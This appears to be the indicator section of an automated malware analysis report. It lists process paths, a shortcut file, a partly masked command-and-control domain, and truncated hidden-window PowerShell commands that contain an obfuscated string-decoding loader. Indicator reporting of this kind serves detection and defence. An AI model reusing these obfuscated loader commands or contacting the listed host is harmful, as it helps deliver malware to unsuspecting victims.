Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %HOMEPATH%\documents\revivescence2.lnk
- 'po######est.xperiorlist.com':443
- 'po######est.xperiorlist.com':443
- DNS ASK po######est.xperiorlist.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Nearaivays = """RFKuFnScBtsiCoOnG RLSeLgSaItFeTdG0V0H O{SpsaUrPaFmK(C[BSCtArRiSnDgG]H`$HVSiGpSpqeErFnAeasU)I;IFKosrE(F`$mGSrTaSnTuSlHiPtLeM=S1f;D s`$DGBrMaEnpuSlUiOtCeu R-SlVtF G`$TVTiUpUpPeG...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo REG_SZ
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Nearaivays = """RFKuFnScBtsiCoOnG RLSeLgSaItFeTdG0V0H O{SpsaUrPaFmK(C[BSCtArRiSnDgG]H`$HVSiGpSpqeErFnAeasU)I;IFKosrE(F`$mGSrTaSnTuSlHiPtLeM=S1f;D s`$DGBrMaEnpuSlUiOtCeu R-SlVtF G`$TVTiUpUpPeG...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Legated00 {param([String]$Vippernes);For($Granulite=1; $Granulite -lt $Vippernes.Length-1; $Granulite+=(1+1)){$Ringvejsprojekters = $Ringvejsprojekters + $Vippernes.Substring($Granuli...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'